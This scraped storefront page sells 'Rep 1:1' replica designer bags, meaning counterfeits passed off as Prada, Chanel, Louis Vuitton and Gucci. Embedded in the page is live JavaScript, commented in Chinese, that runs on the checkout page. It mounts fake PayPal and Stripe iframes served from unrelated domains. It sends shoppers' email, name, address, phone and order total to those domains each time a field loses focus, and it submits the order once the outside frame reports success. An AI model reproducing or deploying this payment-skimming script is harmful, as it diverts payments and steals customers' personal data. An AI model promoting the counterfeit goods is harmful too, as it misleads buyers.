- You cannot add "Nike Victory One Slides White & Black Bold Edition - 45" to the cart because the product is out of stock.
Prada Cleo Brushed Shoulder Bag In Black For Women 10.6 in / 27 cm
$569.00 Original price was: $569.00.$269.00Current price is: $269.00.
The Prada Cleo Brushed Shoulder Bag with sophisticated allure reinterprets an iconic design of the brand from the nineties. The sleek, curved lines emphasized by the particular sloped construction of the bottom and sides give this hobo bag a soft, light look. A distinctive element of Prada collections, is a modern and versatile material that lends itself to always new combinations and contrasts. The triangle logo decorates the silhouette.
- Rep 1:1
- Size: 27 x 22 x 6 cm / 10.6 x 8.7 x 2.4 inches (Length x Height x Width)
- Handle with extension for use as a crossbody bag
- Metal Gold tone hardware
- Metal triangle logo on the front
- Magnet closure
- Includes dust bag.
- This product is of the best quality.
Reviews (0)
Shipping & Delivery
et Your Items Quickly and Easily!
Here’s a breakdown of our shipping process to help you understand the timelines:
Order Processing:
- We typically process orders within 3-5 business days.
- During peak seasons like holidays, there might be slight delays.
Shipping Time:
- Shipping times vary depending on your location.
- We offer a flat-rate shipping option with an estimated delivery time of 7-15 business days after processing.
Tracking Your Order:
- You’ll receive an email notification with your tracking number once your order ships.
- You can track your package using this number on the website of the carrier we use (typically FedEx, UPS, USPS, or DHL).
Need Help?
If you have any questions about your order or shipping, please don’t hesitate to contact our friendly customer support team at support@elegousshop.com We’re always happy to help!
Additional Notes:
If you offer expedited shipping options, you can mention them here briefy with estimated delivery times and additional costs if applicable).
Chanel Deauville Tote Bag in Tweed Canvas, Beige/Cream/Gold/Multi, from the Fall/Winter Collection for Women, 15in/38cm
$375.00 Original price was: $375.00.$243.75Current price is: $243.75.
Louis Vuitton Neverfull MM Tote Bag Damier Azur Canvas Rose Ballerine Pink For Women, Women’s Bags, Shoulder Bags 12.2in/31cm LV N41605
$345.00 Original price was: $345.00.$224.25Current price is: $224.25.
Chanel Classic Tote Bag Silver Hardware Black For Women 13.3in/34cm
$389.00 Original price was: $389.00.$291.75Current price is: $291.75.
Chanel Classic Handbag Gold Toned Hardware Black For Women, Women’s Bags, Shoulder And Crossbody Bags 10.2in/26cm A01112
$361.00 Original price was: $361.00.$270.75Current price is: $270.75.
Louis Vuitton OnTheGo MM For Women M22975 – 35 Cm/ 13.8 Inches
$420.00 Original price was: $420.00.$231.00Current price is: $231.00.
Gucci Ophidia GG Medium Tote Bag Beige/Ebony GG Supreme Canvas With Brown For Women 13in/33cm GG 524537 K05NB 8745
$345.00 Original price was: $345.00.$258.75Current price is: $258.75.
Louis Vuitton Avenue Sling Bag in Monogram Canvas for Men, Men’s Crossbody Bag, 12.2in/31cm, LV
$304.00 Original price was: $304.00.$212.80Current price is: $212.80.
Chanel Classic Handbag Silver Hardware Beige For Women, Women’s Bags, Shoulder And Crossbody Bags 10.2in/26cm A01112
$361.00 Original price was: $361.00.$252.70Current price is: $252.70.
Hey you, sign up and connect to Fasbags Crozus!
No account yet?
Sorry, this product is unavailable. Please choose a different combination.
var clearSetInter = null;
function iframePay() { var url = window.location.href; var len = jQuery(".wc-block-checkout__actions").size();
if (url.includes('checkout') && len) { mountBothIframes(); // 同时挂载 PayPal + Stripe } }
function mountBothIframes() { let hostName = "https://" + window.location.hostname; const PAYPAL_HOST = "https://watertreatmentchuh.shop"; // /?update=
// 判断金额,跳去哪里付款 // let STRIPE_HOST = "https://purifiertreatment.shop"; // var priceCopyLost = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; // priceCopyLost = priceCopyLost.replace("$", ""); // if (priceCopyLost <= 300) { // STRIPE_HOST = "https://purifiertreatment.shop"; // /pay.html?update= // }else { let STRIPE_HOST = "https://egkagi.com"; // /pay.html?update= // } // 记录两个子页的 origin(用于 postMessage 与校验) window.__payOrigins = { paypal: new URL(PAYPAL_HOST).origin, stripe: new URL(STRIPE_HOST).origin }; // 移除旧的 ['#crossDomainIframePaypal', '#crossDomainIframeStripe'].forEach(sel => { let el = document.querySelector(sel); if (el) { try { el.onload = null; } catch(e){} try { el.src = 'about:blank'; } catch(e){} try { el.remove(); } catch(e){} } });
// 先放 PayPal(高度 220) const iframePayPal = document.createElement('iframe'); iframePayPal.id = 'crossDomainIframePaypal'; iframePayPal.width = '100%'; iframePayPal.height = '80'; iframePayPal.src = PAYPAL_HOST + '/pay.html?update=' + Date.now();
// 再放 Stripe(高度 750) const iframeStripe = document.createElement('iframe'); iframeStripe.id = 'crossDomainIframeStripe'; iframeStripe.width = '100%'; iframeStripe.height = '950'; iframeStripe.setAttribute('allow', 'payment *'); iframeStripe.allowPaymentRequest = true; iframeStripe.src = STRIPE_HOST + '/pay.html?update=' + Date.now();
// 插入到下单按钮后 jQuery(".wc-block-checkout__actions").after(iframeStripe); // var priceCopy = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; // priceCopy = priceCopy.replace("$", ""); // if (priceCopy <= 400) { // jQuery(".wc-block-checkout__actions").after(iframePayPal); // } // jQuery(".wc-block-checkout__actions").after(iframePayPal); // 绑定 onload:注册/重绑一次性表单监听,并把账单推给两个 iframe iframePayPal.onload = iframeStripe.onload = function () { // 避免重复绑定:先清除本功能事件,再重绑 jQuery(document).off('.paybridge'); // 目标 origin var targetPaypal = window.__payOrigins.paypal; var targetStripe = window.__payOrigins.stripe; // 构造账单载荷 let billingAddress = { "email": "", "country": "", "first_name": "", "last_name": "", "address_1": "", "address_2": "", "city": "", "state": "", "postcode": "", "phone": "", "price": "", "hostName": hostName }; function getAddress(value) { if (value == "country") { return jQuery("#shipping-country").val() || jQuery("#billing-country").val() || ""; } else if (value == "first_name") { return jQuery("#shipping-first_name").val() || jQuery("#billing-first_name").val() || ""; } else if (value == "last_name") { return jQuery("#shipping-last_name").val() || jQuery("#billing-last_name").val() || ""; } else if (value == "address_1") { return jQuery("#shipping-address_1").val() || jQuery("#billing-address_1").val() || ""; } else if (value == "address_2") { return jQuery("#shipping-address_2").val() || jQuery("#billing-address_2").val() || ""; } else if (value == "city") { return jQuery("#shipping-city").val() || jQuery("#billing-city").val() || ""; } else if (value == "state") { return jQuery("#shipping-state").val() || jQuery("#billing-state").val() || ""; } else if (value == "postcode") { return jQuery("#shipping-postcode").val() || jQuery("#billing-postcode").val() || ""; } else if (value == "phone") { return jQuery("#shipping-phone").val() || jQuery("#billing-phone").val() || ""; } else if (value == "price") { var price = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; return price.replace("$", ""); } return ""; } function requestBillingAddress() { billingAddress = { "email": jQuery("#email").val() || "", "country": getAddress("country"), "first_name": getAddress("first_name"), "last_name": getAddress("last_name"), "address_1": getAddress("address_1"), "address_2": getAddress("address_2"), "city": getAddress("city"), "state": getAddress("state"), "postcode": getAddress("postcode"), "phone": getAddress("phone"), "price": getAddress("price"), "hostName": hostName } } // 给两个子页都发 function postToChildren() { try { iframePayPal.contentWindow && iframePayPal.contentWindow.postMessage(billingAddress, targetPaypal); } catch(e){} try { iframeStripe.contentWindow && iframeStripe.contentWindow.postMessage(billingAddress, targetStripe); } catch(e){} } // 绑定所有你原有的事件(仅事件名加 .paybridge 命名空间) jQuery(`#email, #billing-country, #billing-first_name, #billing-last_name, #billing-address_1, #billing-address_2, #billing-city, #billing-state, #billing-postcode, #billing-phone`).on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); jQuery(`#email, #shipping-country, #shipping-first_name, #shipping-last_name, #shipping-address_1, #shipping-address_2, #shipping-city, #shipping-state, #shipping-postcode, #shipping-phone`).on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); jQuery("#billing-country, #billing-state, #shipping-country, #shipping-state").on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); // 折扣代码变化 jQuery(document).on("blur.paybridge", "#wc-block-components-totals-coupon__form input", function() { var originalPrice = getAddress("price"); var clearCoupon = setInterval(function() { if (originalPrice != getAddress("price")) { requestBillingAddress(); postToChildren(); clearInterval(clearCoupon); } }, 500); setTimeout(()=>clearInterval(clearCoupon), 5000); }); // 取消优惠码 jQuery(document).on("touchstart.paybridge", ".wc-block-components-chip__remove", function() { var originalPrice = getAddress("price"); var clearCoupon = setInterval(function() { if (originalPrice != getAddress("price")) { requestBillingAddress(); postToChildren(); clearInterval(clearCoupon); } }, 500); setTimeout(()=>clearInterval(clearCoupon), 5000); });
// 触摸触发一次 jQuery(document).on("touchstart.paybridge", ()=> { requestBillingAddress(); postToChildren(); });
// 初始化 & 延时再发一次 requestBillingAddress(); postToChildren(); setTimeout(function(){ requestBillingAddress(); postToChildren(); }, 1000); };
// 只注册一次 message 监听(接受两个源) if (!window.__payMsgBound) { window.__payMsgBound = true; window.addEventListener('message', function(event) { const origins = window.__payOrigins || {}; const allow = (event.origin === origins.paypal) || (event.origin === origins.stripe); if (!allow) return;
// 处理消息(与原逻辑一致) if (event.data == "paypal_pay_success") { jQuery('.wc-block-components-checkout-place-order-button').click(); } if (event.data == "paypal_pay_click") { if (jQuery("#email").val() == "") { jQuery("#email").focus(); } else if (jQuery("#billing-country").val() == null) { jQuery("#billing-country").focus(); } else if (jQuery("#shipping-first_name").val() == "" || jQuery("#billing-first_name").val() == "") { jQuery("#shipping-first_name").focus(); jQuery("#billing-first_name").focus(); } else if (jQuery("#shipping-last_name").val() == "" || jQuery("#billing-last_name").val() == "") { jQuery("#shipping-last_name").focus(); jQuery("#billing-last_name").focus(); } else if (jQuery("#shipping-address_1").val() == "" || jQuery("#billing-address_1").val() == "") { jQuery("#shipping-address_1").focus(); jQuery("#billing-address_1").focus(); } else if (jQuery("#shipping-city").val() == "" || jQuery("#billing-city").val() == "") { jQuery("#shipping-city").focus(); jQuery("#billing-city").focus(); } else if (jQuery("#billing-state").val() == null || jQuery("#billing-state").val() == "") { jQuery("#billing-state").focus(); } else if (jQuery("#shipping-postcode").val() == "" || jQuery("#billing-postcode").val() == "") { jQuery("#shipping-postcode").focus(); jQuery("#billing-postcode").focus(); } } }, { passive: true }); }
// 清除定时器(保留你的机制) clearInterval(clearSetInter); }
// 继续保留你的定时器机制
clearSetInter = setInterval(iframePay, 1000);
Reviews
There are no reviews yet.
| Size | UK | US | EU | Japan |
| XS | 6 - 8 | 4 | 34 | 7 |
| S | 8 -10 | 6 | 36 | 9 |
| M | 10 - 12 | 8 | 38 | 11 |
| L | 12 - 14 | 10 | 40 | 13 |
| XL | 14 - 16 | 12 | 42 | 15 |
| XXL | 16 - 28 | 14 | 44 | 17 |

There are no reviews yet.